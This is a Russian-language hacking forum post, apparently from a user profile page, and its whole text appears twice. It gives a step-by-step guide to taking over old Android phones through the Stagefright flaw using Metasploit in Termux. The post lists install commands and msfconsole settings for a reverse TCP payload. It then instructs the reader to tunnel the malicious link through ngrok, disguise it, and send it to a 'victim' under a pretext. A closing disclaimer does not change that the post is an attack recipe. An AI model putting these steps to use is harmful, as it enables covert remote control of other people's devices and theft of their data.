- Регистрация
- 8 Янв 2019
- Сообщения
- 527
- Реакции
- 71
- Баллы
- 118
[SIZE=14pt]Приветствую, хакеры! В данной небольшой статье мы поговорим о том, как при помощи всего-лишь одной ссылки получить полный контроль над чужим устройством.[/SIZE]
[SIZE=14pt]Поможет нам в этом специальная утилита Metasploit, которая прекрасно справляется с уязвимостями Android старых версий.[/SIZE]
[SIZE=14pt]Приступим:[/SIZE]
[SIZE=14pt]1. Первым делом устанавливаем нашу утилиту в Termux:[/SIZE]
[SIZE=14pt] update[/SIZE]
[SIZE=14pt] apt upgrade[/SIZE]
[SIZE=14pt] pkg install unstable-repo[/SIZE]
[SIZE=14pt]pkg install Metasploit[/SIZE]
[SIZE=14pt]2. [/SIZE][SIZE=14pt]После[/SIZE] [SIZE=14pt]этого[/SIZE] [SIZE=14pt]запускаем[/SIZE] [SIZE=14pt]утилиту[/SIZE][SIZE=14pt]:[/SIZE]
[SIZE=14pt]3. Теперь, если Stagefright нет в Metasploit, то скачиваем его отсюда [/SIZE][SIZE=14pt]→[/SIZE][SIZE=14pt]ТЫК[/SIZE][SIZE=14pt]←[/SIZE] [SIZE=14pt]и[/SIZE] [SIZE=14pt]перекидываем[/SIZE] [SIZE=14pt]в[/SIZE] [SIZE=14pt]папку[/SIZE] [SIZE=14pt]с[/SIZE] [SIZE=14pt]эксплоитами[/SIZE][SIZE=14pt].[/SIZE]
[SIZE=14pt]4. После этого прописываем:[/SIZE]
[SIZE=14pt] msfconsole — открытие консоли[/SIZE]
[SIZE=14pt] use exploit/android/browser/stagefrightmp4tx3g64bit — [/SIZE][SIZE=14pt]подключение[/SIZE] [SIZE=14pt]эксплоита[/SIZE]
[SIZE=14pt] set SRVHOST [/SIZE][SIZE=14pt]ваш[/SIZE][SIZE=14pt]IP[/SIZE]
[SIZE=14pt] URIPATH /[/SIZE]
[SIZE=14pt] set PAYLOAD linux/armle/mettle/reversetcp[/SIZE]
[SIZE=14pt] set LHOST [/SIZE][SIZE=14pt]ваш[/SIZE][SIZE=14pt]IP[/SIZE]
[SIZE=14pt] set VERBOSE true[/SIZE]
[SIZE=14pt]exploit -j — [/SIZE][SIZE=14pt]запуск[/SIZE] [SIZE=14pt]эксплоита[/SIZE]
[SIZE=14pt]Для нас сгенерируется специальная ссылка. Заворачиваем её в ngrok, по желанию маскируем и отправляем жертве под любым предлогом. Когда жертва по ней перейдёт, мы получим удалённый доступ к устройству.[/SIZE]
[SIZE=16pt]Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.[/SIZE]
[SIZE=14pt]Поможет нам в этом специальная утилита Metasploit, которая прекрасно справляется с уязвимостями Android старых версий.[/SIZE]
[SIZE=14pt]Приступим:[/SIZE]
[SIZE=14pt]1. Первым делом устанавливаем нашу утилиту в Termux:[/SIZE]
[SIZE=14pt] update[/SIZE]
[SIZE=14pt] apt upgrade[/SIZE]
[SIZE=14pt] pkg install unstable-repo[/SIZE]
[SIZE=14pt]pkg install Metasploit[/SIZE]
[SIZE=14pt]2. [/SIZE][SIZE=14pt]После[/SIZE] [SIZE=14pt]этого[/SIZE] [SIZE=14pt]запускаем[/SIZE] [SIZE=14pt]утилиту[/SIZE][SIZE=14pt]:[/SIZE]
[SIZE=14pt]3. Теперь, если Stagefright нет в Metasploit, то скачиваем его отсюда [/SIZE][SIZE=14pt]→[/SIZE][SIZE=14pt]ТЫК[/SIZE][SIZE=14pt]←[/SIZE] [SIZE=14pt]и[/SIZE] [SIZE=14pt]перекидываем[/SIZE] [SIZE=14pt]в[/SIZE] [SIZE=14pt]папку[/SIZE] [SIZE=14pt]с[/SIZE] [SIZE=14pt]эксплоитами[/SIZE][SIZE=14pt].[/SIZE]
[SIZE=14pt]4. После этого прописываем:[/SIZE]
[SIZE=14pt] msfconsole — открытие консоли[/SIZE]
[SIZE=14pt] use exploit/android/browser/stagefrightmp4tx3g64bit — [/SIZE][SIZE=14pt]подключение[/SIZE] [SIZE=14pt]эксплоита[/SIZE]
[SIZE=14pt] set SRVHOST [/SIZE][SIZE=14pt]ваш[/SIZE][SIZE=14pt]IP[/SIZE]
[SIZE=14pt] URIPATH /[/SIZE]
[SIZE=14pt] set PAYLOAD linux/armle/mettle/reversetcp[/SIZE]
[SIZE=14pt] set LHOST [/SIZE][SIZE=14pt]ваш[/SIZE][SIZE=14pt]IP[/SIZE]
[SIZE=14pt] set VERBOSE true[/SIZE]
[SIZE=14pt]exploit -j — [/SIZE][SIZE=14pt]запуск[/SIZE] [SIZE=14pt]эксплоита[/SIZE]
[SIZE=14pt]Для нас сгенерируется специальная ссылка. Заворачиваем её в ngrok, по желанию маскируем и отправляем жертве под любым предлогом. Когда жертва по ней перейдёт, мы получим удалённый доступ к устройству.[/SIZE]
[SIZE=16pt]Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.[/SIZE]